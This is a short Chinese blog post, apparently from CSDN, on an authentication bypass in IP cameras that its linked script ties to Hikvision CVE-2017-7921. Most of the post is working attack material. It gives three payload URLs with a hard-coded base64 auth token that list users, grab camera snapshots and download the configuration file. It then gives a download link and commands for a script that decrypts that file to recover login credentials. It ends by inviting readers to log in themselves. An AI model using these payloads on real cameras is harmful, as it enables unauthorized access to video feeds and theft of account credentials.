前言:CSDN管理博客内容较严格,有些内容会涉嫌违法违规,以往发布的被打回,这篇文章是经修改后的,故下面有些内容我会粗略写到,大家主要看payload即可
漏洞描述
该公司多款产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。
通过构造url进行检索所有用户、屏幕截图、配置文件下载,得到二进制配置文件:configurationFile,并且可以提取登录的账号密码。
Payload
IP/Security/users?auth=YWRtaW46MTEK
检索所有用户
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
获取镜头快照而不进行身份验证
IP/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头二进制配置文件
影响版本
因涉嫌违法,经修改暂略
解密二进制文件(configurationFile)
1、脚本下载:
- 百度网盘链接:https://pan.baidu.com/s/1sMV0kCeqv7mHD0BHB3qEDw
提取码:peak - 脚本原链接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
2、脚本使用方法:
- 依赖库:pycryptodome
依赖库安装:py -3 -m pip install pycryptodome
因为我的电脑安装了两个版本的python,所以使用py -3 - 解密命令:
py -3 decrypt_configurationFile.py configurationFile
红框中的就是后台登陆的账号密码
由于特殊原因,就写到这里,不进行摄像头的登录了,方法交给你们了,有兴趣的自己去验证吧